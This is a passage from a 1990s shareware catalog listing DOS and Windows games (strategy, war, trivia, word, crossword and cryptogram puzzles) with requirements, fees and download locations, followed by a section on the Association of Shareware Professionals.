SimCity. + + + Product: Oil Baron + Author: Al Funk + Version: 1.2 (05-11-93) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor. + Mouse recommended. + Registration fee: $10.00 + Registration benefits: Support, free updates. + Look for: OILBRN12.ZIP on BBSs; OILBRN.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 71505,1277 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Board-type game with a user-sizeable grid, randomly drawn + chits, and many user-customizable play options. Place chits on + the grid to create companies; buy and sell trades in the + + Chapter 17, "Games" 696 + + + + companies, and profit off of company growth and/or mergers. + Play against a friend, the computer, or against a combination + of human and computer players. The game includes shareholdings, + wealth, and company information graphs. + + + Product: Towers + Author: Cascoly Software, 206-523-6135 + Version: 1.27 (02-20-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; TOWER.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 318 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + How high can you build? Similar to Tetris, since you need to + place blocks of varying size. That's where the similarity ends + - you need logic and planning, rather than quick reflexes. You + build one level of the tower at a time, trying to fit the + blocks in the tightest pattern. Each level becomes the base + for the next level. Uses Cascoly's unique 3-D perspective + graphics to show fantastic detail. As you scroll from side to + side, the perspective changes. + + + Product: WALL STREET RAIDER + Author: RONIN Software, 206-391-4036 + Version: 4.2 (04-30-94) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. Does not + run on IBM PCjr. + Strongly recommended: CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on other products. 1 free update disk(s) + sent out. + Look for: WSR4_2.ZIP on BBSs (call 703-680-9269 to download it at + no charge). + Download size: 455k (about 34 minutes with a 2400 baud modem) + Description: + A high-stakes, nonstop game of corporate finance, with "live" + stock ticker, where 1-4 players (& computer) battle for profits + in an amazingly realistic simulation. Has 250 companies in 36 + industry groups, each trying to dominate its own industry and + crush the competition, while players seek to get rich, do + + Chapter 17, "Games" 697 + + + + takeovers, greenmail, LBO's, mergers, issue junk bonds (and + play dirty) to grasp and control the world's largest + corporations, from Exxon on down. The ultimate in realistic + stock market games! + + + Product: WEBS + Author: Cascoly Software, 206-523-6135 + Version: 1.2 (06-11-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WEBS.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1707 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A deceptively simple solitaire game requiring both strategy and + cunning. You claim nodes on a web while trying to limit the + moves available to your opponent. Automatic display of + potential moves, a variety of webs and difficulties give hours + of challenge. + + + Product: WOWSpill + Windows game, connect the pipe before a spill. See full + description on page 666. + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 687. + + 17.14.1 War games + + Product: Declaration of War + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.1 (08-15-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $39.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; all ASP-wide offers (see page 6); + + Chapter 17, "Games" 698 + + + + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: DOWAR11.ZIP on BBSs (call 312-922-2839 to download it + at no charge); DOWAR*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 3242 + PsL#: 11535 + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A Windows strategy/war game set in modern times. Allows for up + to six human or computer players, play- by-mail games, + handicapping with 24 strength levels, and 14 types of pieces. + On-line help. + + + Product: Medieval War + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.5 (02-16-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $29.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: MEDWAR12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDWA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 4917 + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + A Windows war/strategy game set in medieval times. Allows for + up to six human or computer players, play-by-mail games, + handicapping with 24 strength levels, and 14 different types of + pieces. On-line help. + + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 425. + + Chapter 17, "Games" 699 + + + + 17.15 Trivia + + Product: Have You Read That Movie? + Author: 100% Cotton Software, 717-289-4019 + Version: 1.0 (04-01-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; disks of other + shareware. + Look for: LITQUIZ1.ZIP on BBSs. + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + An entertainment-educational program that tests the user's + knowledge of literature and film via a multiple-choice format. + 365+ questions (easy, medium & hard) about films based on + literary works. Each correct answer is accompanied by some + interesting fact(s) about the movie or literary work. Three + modes of play: Single Player, Two Players Alternate, and Two + Players Compete (quickest player answers). Many configuration + options. On-line help. Mouse or keyboard. + + + Product: the last word + Author: Bit Masons Consulting, 508-898-3321 + Version: 1.00 (11-25-90) + Needs: IBM PC, DOS 2.1 or better. 384k RAM. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, BBS, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. Lifetime free upgrading allowed. + Look for: LWORD100.ZIP on BBSs; LW100.ZIP on CompuServe in + CIS:GAMERS forum LIBrary 13 (or contact userID 72561,2637 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A quotations trivia game in which 1 to 4 players compete + against each other and their own high scores in identifying the + source of quotations and completing partial quotes. Most + answers are entered free-form and are matched against a set of + acceptable responses by a sophisticated pattern-recognition + algorithm and, thus, the program is very forgiving when it + comes to misspelled or abbreviated answers. The user can + customize settings such as typing time for each player. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 537. + + Chapter 17, "Games" 700 + + + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 538. + + Product: Personal Challenge [***] + Educational trivia game for 1-4 players. See full description + on page 530. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 706. + + + 17.16 Word games + + Product: Cipher + Author: Arcanum Computing + Version: 2.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: EGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHER22.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHER.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode and allows you to + play using a mouse (text modes and keyboard are also + supported). Features include help, hints, save/restore. User + can create their own puzzle files from either plain text quotes + or from already encrypted quotes. + + Chapter 17, "Games" 701 + + + + Product: Cipher for Windows + Author: Arcanum Computing + Version: 1.1 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHWN11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHWN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode under the Microsoft + Windows 3.x environment and allows you to play using a mouse. + Features include standard Windows style hypertext help, hints, + save/restore. User can also create their own puzzle files from + plain text or already encrypted quotes. + + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 523. + + Chapter 17, "Games" 702 + + + + Product: EGAWHEEL + Author: WHEEL Games + Version: V.1.91 (12-18-93) + Needs: IBM PC, DOS 2.11 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; bonus data. + Look for: availability unknown on BBSs; EGAWHE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 7 (or contact userID 76662,1623 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A "Wheel of Fortune"/hangman type of word guessing game for IBM + compatible computers with EGA video card and monitor. The game + features: a colorful spinning wheel, 1-3 players, 6 rounds of + play, a sound on/off option, optional mouse, automatic win + after all letters of the puzzle are bought and guessed, a high + score table for the top ten WHEELERS, and an editor to add/ + delete/modify puzzles. The editor may be used to create a + custom database for a teaching aid from grade school through + college. + + + Product: Fictionary + Author: Cascoly Software, 206-523-6135 + Version: 1.32 (04-30-90) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; FICT.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 8 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + The game of fantastic and farfetched definitions. Each round a + player chooses a word. You can choose your own word or pick one + from the large selection included with the game. Each other + player makes up their own definition for the word. Everyone + votes for the word they think is correct and points are scored + for guessing the proper one, or misleading other players. Great + vocabulary builder. Can be played by 1-6. + + Chapter 17, "Games" 703 + + + + Product: Hang Man + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.1 (08-16-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: HANMAN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); HANMA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 14 (or contact userID 71532,3271 for assistance). + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + A Windows word game for adults and children. The object is to + guess the word before the hang man is complete. On-line help. + + + Product: HANG4.ZIP + Author: Larry W Parker + Version: 4.1 (12-08-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; SVGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; lifetime return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. 99 free update disk(s) sent out. + Look for: availability unknown on BBSs; HANG4.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 8 (or contact userID 70534,1447 for + assistance). + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + The latest of my Hangman series. 8 configureable word files, 2 + included. Make, edit, & view all word files from easy menus. + Options: PC-sound on/off, peek, hints, scorecards,and much + more! Online help is everywhere with a mouse click or the F1 + key. Excellent for foreign languages too. Educational as well + as just fun. + + Chapter 17, "Games" 704 + + + + Product: HangWin + Author: Temprano Software + Version: 2.04 (07-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor. + Registration fee: $11.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; HNGWIN.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 4 (or contact userID 72614,43 for + assistance). + Download size: 256k (about 19 minutes with a 2400 baud modem) + Description: + The traditional hangman word game. Guess the word (or phrase) + before the prisoner hangs. Word puzzles are randomly chosen + from a dictionary. The dictionary may be user-defined. For + fun, the user may choose the prisoner. The prisoner's face is + animated. Can use Window-supported sound boards and also + includes an easy-to-use installation utility and extensive on- + line help. + + + Product: PHRASE.ZIP + Author: Larry W Parker + Version: 1.0 (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; SVGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; lifetime return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. 99 free update disk(s) sent out. + Look for: availability unknown on BBSs; PHRASE.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 8 (or contact userID 70534,1447 for + assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A new & different type of game. A combination of hangman & + wheel of fortune. User can make five phrase files from easy + menus, one file included. Options: PC-sound on/off, hints, + peek, scorecards, editing menus, and more! Make, add, edit, and + erase phrase files from colorful menus with online help. Great + for foreign languages too. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 517. + + Chapter 17, "Games" 705 + + + + Product: VGAWHEEL + Author: WHEEL Games + Version: V.1.91 (12-18-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; bonus data. + Look for: availability unknown on BBSs; VGAWHE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 7 (or contact userID 76662,1623 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A "Wheel of Fortune"/Hangman type of word guessing game. The + game features: a colorful spinning wheel, 1-3 players, 6 rounds + of play, a sound on/off option, automatic win after all letters + have been bought and guessed, optional mouse, a high score + table for the top ten WHEELERS, and an editor to add/delete/ + modify puzzles. The editor may be used to create a custom + database for using the program as a teaching aid in grade + school through college. + + + Product: WINWHEEL + Author: WHEEL Games + Version: 1.70 (01-16-93) + Needs: IBM AT (80286), Windows 3.0 or better. VGA monitor; Hard + disk. VBRUN100.DLL. + Strongly recommended: Mouse. + Registration fee: $19.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of support; bonus data. + Look for: availability unknown on BBSs; WINWHE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 76662,1623 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A Wheel of Fortune/Hangman type word guessing game for Windows + 3.X. Features: colorful graphics, 1-3 players, 6 rounds, sound + on/off options, autowin after all letters bought and guessed, + hi-score table for top 10 WHEELERS, and a powerful puzzle + editor to add/delete/modify puzzles. + + Chapter 17, "Games" 706 + + + + 17.16.1 Crossword puzzles + + Product: Crossdown + Author: CROSSDOWN, 716-482-8092 + Version: 2.8 (05-13-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $30.75 (Canadian dollars) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + GEnie, newsletter, mail support; 1-month return policy; runtime + license; bonus utilities; discounts on other products. 1 free + update disk(s) sent out. Bonus puzzles. + Look for: XDOWN28.ZIP on BBSs (call 716-723-8489 to download it + at no charge); XDOWN2.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 8 (or contact userID 70724,2075 for assistance); + XDOWN28.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 507k (about 38 minutes with a 2400 baud modem) + Description: + Great graphics, animated selection buttons and sounds add to + your enjoyment as you solve real crosswords. Program makes it + easy to construct puzzles, too. Output in a variety of formats + to most printers, with standard puzzle numbering added + automatically! Author is a professional crossword constructor + and has included several of his best puzzles. Recently endorsed + by Simon and Schuster crossword editor John M. Samson! + + + Product: Crossdown for Windows + Author: CROSSDOWN, 716-482-8092 + Version: 1.1 (02-07-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Registration fee: $55.75 (add $63.75 for shipping to Canadian + addresses) (add $68.75 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + all ASP-wide offers (see page 6); discounts on other products. + Free puzzle construction tutoring and marketing assistance. + Look for: availability unknown on BBSs; XWDWIN.ZIP on CompuServe + in CIS:IBM forum LIBrary 8 (or contact userID 70724,2075 for + assistance). + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Brings all the challenge and enjoyment of solving and + constructing crosswords exactly like the ones found in the + daily or Sunday newspapers to the Windows environment, with + plenty of new and exciting features. You can click on a + scrollable clue list to highlight the appropriate word in the + grid or click anywhere on the brid to get a clue. Sound card + + Chapter 17, "Games" 707 + + + + support with speaking messages. Your favorite digital + dictionary can be accessed from within the program. + + + Product: CrossWords + Author: Glen DeBiasa + Version: 1.42 (04-08-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $10.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support. Bonus puzzles. + Look for: availability unknown on BBSs; CROSSW.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + SWREG#: 5910 + Download size: 226k (about 17 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A game whose object is to guess the theme of the crossword + puzzle. Clues are given which reveal letters in the puzzle. + Players can guess at words in the puzzle or at the puzzle's + theme after they have successfully solved a clue within the + given period of time. Instructions are provided for creating + your own puzzle files. + + + Product: Enigmacross + Author: CROSSDOWN, 716-482-8092 + Version: 1.5 (06-12-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $30.75 (Canadian dollars) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month return policy; runtime + license; bonus utilities; all ASP-wide offers (see page 6). 1 + free update disk(s) sent out. Bonus puzzles. + Look for: ENIGMX14.ZIP on BBSs (call 716-723-8489 to download it + at no charge); EGMX14.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 8 (or contact userID 70724,2075 for assistance); + ENIGMX14.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 443k (about 33 minutes with a 2400 baud modem) + Description: + Color graphics, animated selection buttons, sound effects + enhance very easy to use, mouse-based interface. Solve + acrostics exactly like the kind in newspapers and magazines. + Construct your own, too. Hi-quality output on most printers in + + Chapter 17, "Games" 708 + + + + a variety of formats with standard acrostic numbering added + automatically! + + + 17.16.2 Cryptanalysis + + Product: Crypto! + Author: KMR Consulting, 716-293-3241 + Version: 2.0 (03-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $12.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, mail support; bonus utilities; bonus + data; disks of other shareware; registration commissions. 1 + free update disk(s) sent out. Bonus quotes/phrases. + Look for: CRYPTO20.ZIP on BBSs; CRYPTO.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 74034,1441 for + assistance). + SWREG#: 2317 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A Windows version of the popular cryptogram puzzles often found + in puzzle books and the Sunday paper. It selects a puzzle from + its library of 250, encrypts it, and presents it to you to + solve. It makes solving cryptograms more fun by making it easy + to try various letters and erase mistakes. Letter frequencies + are provided, and there are various hints and helps to get you + started quickly. Complete on-line help! Even my wife plays this + game; it is one of only two that she enjoys. + + Chapter 17, "Games" 709 + + + + 17.16.3 Word search + + Product: Finders Keepers + Author: Glen DeBiasa + Version: 1.01 (04-08-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; Hard disk; + Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Epson printer; sound card. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support; bonus data; all ASP-wide + offers (see page 6). Bonus puzzles. + Look for: availability unknown on BBSs; FK100.ZIP on CompuServe + in CIS:GAMERS forum LIBrary 6 (or contact userID 70602,3257 for + assistance). + SWREG#: 5911 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A brand new way of looking at word find puzzles. Customize each + game by controlling how words are shown and by setting the + clock to challenge your skills. The words can be shown all at + once, one word at a time, or not at all. The clock can be set + from 30 seconds to 5 minutes, or can be turned completely off. + Select puzzles by title or at random. Enter your own puzzles + for endless entertainment. Print your favorite puzzles with + solutions. + + + 17.17 For adults + + Product: Edens-for-two + Author: Martlet, Inc., 703-435-5767 + Version: 4.3 (03-18-94) + Needs: IBM PC, DOS 1.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives; Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; 3-month return + policy; royalty-free runtime license; all ASP-wide offers (see + + Chapter 17, "Games" 710 + + + + page 6). 3-month free upgrading allowed. 1 free update disk(s) + sent out. + Look for: availability unknown on BBSs. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Two people reconcile their dreams about where they would love + to live if they were free to move anywhere. They take turns + selecting concerns from a menu and submenus while the program + makes compromise tradeoffs and prints lists of candidate areas, + with facilities in each area. Fun - even for computer novices + Combines information from the best books on ideal places in US. + Don't read the user manual. Program is self-teaching and never + gives you any bad news. + + + 17.18 Game utilities + + Product: BassMap + Lake editor for use with BassTour/BassClass. See full + description on page 689. + + + 17.19 Other + + Product: Talking ABC's + Author: Redwood Games, 707-937-3320 + Version: 4.0 (02-10-93) + Needs: IBM PC, DOS 2.1 or better. Hard disk, CGA monitor (EGA + recommended). + Registration fee: $23.00 + Registration benefits: Printed manual, game personalized with + your child's name, support. Disks of other shareware. + Look for: TALKABC4.ZIP on BBSs; TABC4.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 71501,3553 for + assistance); TALKABC4.ZIP on GEnie in IBMPC forum LIBrary 11 + (or contact userID K.CROWTHER1 for assistance). + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Talks to your child (2-6 years old) in a natural sounding voice + using the PC speaker. No extra equipment needed! Beautiful, + EGA artwork is used in 3 fun games. (CGA mode too!) Children + can create their own pictures with the graphics by pressing + letters and moving objects around. Also included is "follow + the leader" and a matching game. Instructions are spoken so + little onew can play without adult help. + + Chapter 18, "About shareware" 711 + + + + + + Chapter 18 + About shareware + + + 18.1 Assn. Shareware Professionals + + The Association of Shareware Professionals (ASP) formed in 1987 + to strengthen the future of shareware as an alternative to + traditional (retail) software marketing. It also serves as an + information clearing house for its members and the public at + large. ASP members subscribe to a code of ethics and are + committed to the shareware concept. + + The ASP demands professionalism from its members. Authors must + acknowledge every registration (you get more than just a + canceled check) and they must provide at least three months of + support for their products. ASP members must also live up to + any other benefits they offer. + + You can turn to an ombudsman for help if you can't resolve a + problem with an ASP author or disk vendor. Members must + explain this in every shareware program & disk vendor catalog. + + Few people need the ombudsman's help. ASP members represent + the cream of the crop in the shareware industry, but it's nice + to know you can turn to someone if you think you got a raw + deal. Unfortunately, it happens - authors have been kicked out + because of repeated complaints. + + The Association monitors Congress for potentially damaging + legislation and has sent spokesmen to testify before + congressional subcommittees. It has also taken on the respon- + sibility of safeguarding the term 'shareware' itself. ASP has + filed motions in countries as far away as England and South + Africa to stop people who attempt to claim it as a trademark + word. + + ASP members 'meet' online in a public forum of the CompuServe + network (GO SHAREWARE). Members send & receive messages, + transmit files, and exchange valuable information. Old hands + in the shareware business pass along their insights to new + members. The group holds public and private debates and + members vote on major issues by sending private messages to the + Association secretary. + + The ASP holds yearly 'face to face' meetings and appears at + various trade shows around the country (including COMDEX and + PC-EXPO). It also provides speakers who lecture on every + aspect of shareware. You can learn more by writing to the + Association of Shareware Professionals, 545 Grover Road, + Muskegon, MI 49442. If you have a modem and a CompuServe + + Chapter 18, "About shareware" 712 + + + + account, you can log on and go to the SHAREWARE forum for more + information. + + + Product: Approved Vendor Requirements + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (06-10-92) + Look for: availability unknown on BBSs; VENDOR.ARC on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 5k (about one minute with a 2400 baud modem) + Description: + Contains all requirements ASP Approved Vendors must follow. + Potential shareware authors may want to review this file to see + what the ASP uses as its factors for approving disk vendors to + become associate members in the organization. + + + Product: ASP BBS Membership Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (05-21-92) + Look for: availability unknown on BBSs; BBSAPP.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Everything a BBS Sysop needs to join the ASP. Rules, + application form, text files to post on the BBS, etc. All are + text files. + + The ASP BBS Membership ensures callers that the BBS adheres to + certain standards of quality and shareware support. Cost of + membership is $40 / year. + + + Product: ASP List of Approved BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: availability unknown on BBSs; ASPBBS.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A complete list of ASP Approved BBSs. Gives the name, address, + phone number, conferences, lines, protocols, network + affiliations, etc. Formatted for use as a mailing list or for + browsing. Updated monthly. ASP recommends Approved BBSs. + + Chapter 18, "About shareware" 713 + + + + Product: ASP List of Approved Vendors + Author: Association of Shareware Professionals, 616-788-5131 + Look for: availability unknown on BBSs; VENDOR.EXE on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Complete list of ASP Approved Vendors by country and state or + province. Use this catalog to find the ASP Approved Vendor + nearest you. ASP recommends ASP Approved Vendors as one of the + best sources of high quality, up-to-date shareware programs. + Updated monthly. + + + Product: How to join as a "beta" author + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-27-89) + Look for: availability unknown on BBSs; BETA.TXT on CompuServe in + CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 for + assistance). + Download size: 3k (about one 